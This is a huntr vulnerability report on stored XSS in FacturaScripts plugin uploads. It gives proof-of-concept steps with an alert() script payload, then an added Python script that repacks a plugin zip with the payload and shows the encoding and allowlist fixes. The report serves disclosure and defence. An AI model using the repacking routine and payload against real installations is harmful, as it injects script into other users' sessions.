huntr report by iamshooter99, ID 4AE2A917-843A-4AE4-8197-8425A596761C
History: Apr 21, 2022 - 6:43 p.m.

Stored XSS via upload plugin functionality in zip format

2022-04-21 18:43:55
iamshooter99
www.huntr.dev
8

EPSS: 0.001 (Low)
Percentile: 21.6%

Description

Cross-site scripting (XSS) is a common attack vector in which attacker-controlled script is injected into a vulnerable web application and then executed in other users' browsers. Stored XSS, also known as persistent XSS, is generally more damaging than reflected XSS because the payload is saved on the server and served to every user who views the affected page, with no need to lure each victim to a crafted link.

Here the `name` value in the plugin's facturascripts.ini file is not encoded before it is rendered in the application's HTML. After replacing the name with an XSS payload in facturascripts.ini and re-packing the plugin, the payload is stored on upload and executes whenever the plugin list is viewed.

Proof of Concept

  1. Log in as a normal user.
  2. Download any FacturaScripts plugin, for example https://facturascripts.com/DownloadBuild/93/stable.
  3. Unzip it locally and change the name entry in facturascripts.ini to name = '<script>alert(document.domain)</script>'.
  4. Zip it again and upload it through the plugin upload functionality.
  5. The XSS payload executes for every user who views the plugin list.

PoC

https://drive.google.com/file/d/18NGs-gTbwJVDB9P_1NCfQGUbjT1Jv9MC/view?usp=sharing
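The following Python script is an added example, not part of the original report and not FacturaScripts code. It automates steps 3 and 4 of the PoC (rewrite the `name` key in facturascripts.ini inside a plugin zip and re-pack it), then shows the defensive side: a minimal allowlist check an upload handler could apply to the parsed name, and the difference between rendering the name raw and rendering it HTML-encoded. The plugin archive, its ini contents and the two render functions are constructed for illustration; FacturaScripts itself is a PHP application and its real templates and upload code are not reproduced here.

```python
import configparser
import html
import io
import re
import zipfile

# Constructed sample plugin metadata (hypothetical values; only the
# `name = ...` line is relevant to the PoC).
SAMPLE_INI = """\
name = 'SamplePlugin'
description = 'Constructed sample plugin used for this example'
version = 1.0
min_version = 2022
"""

# The payload from the report.
PAYLOAD = "<script>alert(document.domain)</script>"

# Allowlist for plugin names, an assumption for this example rather than
# FacturaScripts' own rule: letters, digits, underscore, dot, dash, space.
NAME_RE = re.compile(r"^[A-Za-z0-9_.\- ]{1,64}$")


def build_plugin_zip(plugin_dir: str, ini_text: str) -> bytes:
    """Build an in-memory plugin archive: <plugin_dir>/facturascripts.ini."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{plugin_dir}/facturascripts.ini", ini_text)
    return buf.getvalue()


def set_ini_name(ini_text: str, new_name: str) -> str:
    """Replace the value of the `name` key, leaving every other line intact."""
    pattern = re.compile(r"^(\s*name\s*=\s*).*$", re.MULTILINE)
    if not pattern.search(ini_text):
        raise ValueError("facturascripts.ini has no `name` key")
    return pattern.sub(lambda m: f"{m.group(1)}'{new_name}'", ini_text, count=1)


def poison_plugin_zip(original_zip: bytes, payload: str) -> bytes:
    """PoC steps 3-4: unzip, rewrite the name in facturascripts.ini, re-zip."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(original_zip)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info)
            if info.filename.endswith("facturascripts.ini"):
                data = set_ini_name(data.decode("utf-8"), payload).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def read_plugin_name(zip_bytes: bytes) -> str:
    """What the server does on upload: locate the ini and parse the `name` key."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        ini_path = next(n for n in zf.namelist() if n.endswith("facturascripts.ini"))
        text = zf.read(ini_path).decode("utf-8")
    # The file has no section header, so prepend one for configparser.
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string("[plugin]\n" + text)
    return cp["plugin"]["name"].strip("'\"")


def is_valid_plugin_name(name: str) -> bool:
    """Upload-time check: reject names outside the allowlist (defence in depth)."""
    return NAME_RE.match(name) is not None


def render_plugin_row_vulnerable(name: str) -> str:
    """Hypothetical template that interpolates the name without encoding."""
    return f"<td>{name}</td>"


def render_plugin_row_fixed(name: str) -> str:
    """Same template with contextual output encoding (PHP equivalent: htmlspecialchars)."""
    return f"<td>{html.escape(name, quote=True)}</td>"


if __name__ == "__main__":
    original = build_plugin_zip("SamplePlugin", SAMPLE_INI)
    malicious = poison_plugin_zip(original, PAYLOAD)
    name = read_plugin_name(malicious)
    print("parsed name :", name)
    print("allowlisted :", is_valid_plugin_name(name))
    print("raw render  :", render_plugin_row_vulnerable(name))
    print("safe render :", render_plugin_row_fixed(name))
```

Running the script shows that the raw render emits the `<script>` tag verbatim, which is the stored XSS, while the encoded render turns it into inert `&lt;script&gt;` text and the allowlist check would have rejected the name before it was ever stored. Output encoding at the render site is the primary fix; the upload-time allowlist is an extra layer, since a plugin name has no legitimate need for HTML metacharacters.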

